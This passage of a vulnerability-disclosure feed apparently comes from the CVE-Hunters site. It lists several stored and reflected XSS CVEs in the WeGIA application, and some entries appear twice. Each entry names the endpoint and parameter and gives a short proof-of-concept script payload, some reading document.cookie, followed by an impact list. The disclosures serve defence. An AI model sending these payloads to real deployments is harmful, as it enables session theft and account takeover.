href="https://www.cve.org/CVERecord?id=CVE-2025-23038" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23038</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>remuneracao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/remuneracao.php</code></p> <p>Parameter: <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>remuneracao.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1.png" width="806" height="305" srcset="/p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1_hu_6f4bc7bc7396ab64.png 480w, /p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1_hu_154c335fc06f8a46.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="264" data-flex-basis="634px" /></p> <p><img src="/p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889.png" width="806" height="179" srcset="/p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889_hu_d35958348c77a2c7.png 480w, /p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889_hu_37304eb15af644d6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="450" data-flex-basis="1080px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rp2v-7hpw-m6qc" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rp2v-7hpw-m6qc</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22596/ https://www.cvehunters.com/p/cve-2025-22596/ <h2 id="cve-2025-22596-cross-site-scripting-xss-reflected-endpoint-modulos_visiveisphp-parameter-msg_c">CVE-2025-22596: Cross-Site Scripting (XSS) Reflected endpoint <code>modulos_visiveis.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22596" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22596</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>modulos_visiveis.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>modulos_visiveis.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22596-cross-site-scripting-xss-reflected-endpoint-modulos_visiveisphp-parameter-msg_c">CVE-2025-22596: Cross-Site Scripting (XSS) Reflected endpoint <code>modulos_visiveis.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22596" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22596</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>modulos_visiveis.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>modulos_visiveis.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921.png" width="808" height="471" srcset="/p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921_hu_c3ac08fb7c09058c.png 480w, /p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921_hu_a5701c0c08bf0889.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="411px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jcj3-gqj3-rrvm" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jcj3-gqj3-rrvm</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 10 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22597/ https://www.cvehunters.com/p/cve-2025-22597/ <h2 id="cve-2025-22597-cross-site-scripting-xss-stored-endpoint-cobrancacontrollerphp-parameter-local_recepcao">CVE-2025-22597: Cross-Site Scripting (XSS) Stored endpoint <code>CobrancaController.php</code> parameter <code>local_recepcao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22597" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22597</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>CobrancaController.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>local_recepcao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/socio/sistema/controller/CobrancaController.php</code></p><h2 id="cve-2025-22597-cross-site-scripting-xss-stored-endpoint-cobrancacontrollerphp-parameter-local_recepcao">CVE-2025-22597: Cross-Site Scripting (XSS) Stored endpoint <code>CobrancaController.php</code> parameter <code>local_recepcao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22597" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22597</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>CobrancaController.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>local_recepcao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/socio/sistema/controller/CobrancaController.php</code></p> <p>Parameter: <code>local_recepcao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>local_recepcao</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90.png" width="810" height="514" srcset="/p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90_hu_18afd47f918c912d.png 480w, /p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90_hu_7e3b22d34116d79a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="157" data-flex-basis="378px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mgj3-g922-2r9v" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mgj3-g922-2r9v</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 10 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22598/ https://www.cvehunters.com/p/cve-2025-22598/ <h2 id="cve-2025-22598-cross-site-scripting-xss-stored-endpoint-cadastrarsociophp-parameter-nome">CVE-2025-22598: Cross-Site Scripting (XSS) Stored endpoint <code>cadastrarSocio.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22598" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22598</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastrarSocio.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/contribuicao/php/cadastrarSocio.php</code></p><h2 id="cve-2025-22598-cross-site-scripting-xss-stored-endpoint-cadastrarsociophp-parameter-nome">CVE-2025-22598: Cross-Site Scripting (XSS) Stored endpoint <code>cadastrarSocio.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22598" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22598</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastrarSocio.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/contribuicao/php/cadastrarSocio.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cadastrarSocio.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a.png" width="809" height="504" srcset="/p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a_hu_41e57a1de02764af.png 480w, /p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a_hu_461c74bdbd1c4696.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="160" data-flex-basis="385px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9x2j-pw3h-p53f" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9x2j-pw3h-p53f</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 10 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22599/ https://www.cvehunters.com/p/cve-2025-22599/ <h2 id="cve-2025-22599-cross-site-scripting-xss-reflected-endpoint-homephp-parameter-msg_c">CVE-2025-22599: Cross-Site Scripting (XSS) Reflected endpoint <code>home.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22599" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22599</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>home.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>home.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22599-cross-site-scripting-xss-reflected-endpoint-homephp-parameter-msg_c">CVE-2025-22599: Cross-Site Scripting (XSS) Reflected endpoint <code>home.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22599" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22599</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>home.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>home.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52.png" width="1198" height="420" srcset="/p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52_hu_48499e1b4cdde843.png 480w, /p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52_hu_3c70275f215ee3cf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="285" data-flex-basis="684px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8354-6cxw-7g8c" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8354-6cxw-7g8c</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 10 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22600/ https://www.cvehunters.com/p/cve-2025-22600/ <h2 id="cve-2025-22600-cross-site-scripting-xss-reflected-endpoint-configuracao_doacaophp-parameter-avulso">CVE-2025-22600: Cross-Site Scripting (XSS) Reflected endpoint <code>configuracao_doacao.php</code> parameter <code>avulso</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22600" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22600</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>configuracao_doacao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>avulso</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/contribuicao/php/configuracao_doacao.php</code></p> <p>Parameter: <code>avulso</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>avulso</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22600-cross-site-scripting-xss-reflected-endpoint-configuracao_doacaophp-parameter-avulso">CVE-2025-22600: Cross-Site Scripting (XSS) Reflected endpoint <code>configuracao_doacao.php</code> parameter <code>avulso</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22600" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22600</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>configuracao_doacao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>avulso</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/contribuicao/php/configuracao_doacao.php</code></p> <p>Parameter: <code>avulso</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>avulso</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340.png" width="1967" height="819" srcset="/p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340_hu_d260d4985fde988d.png 480w, /p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340_hu_9722b25eb2a6c525.png 1024w" loading="lazy" 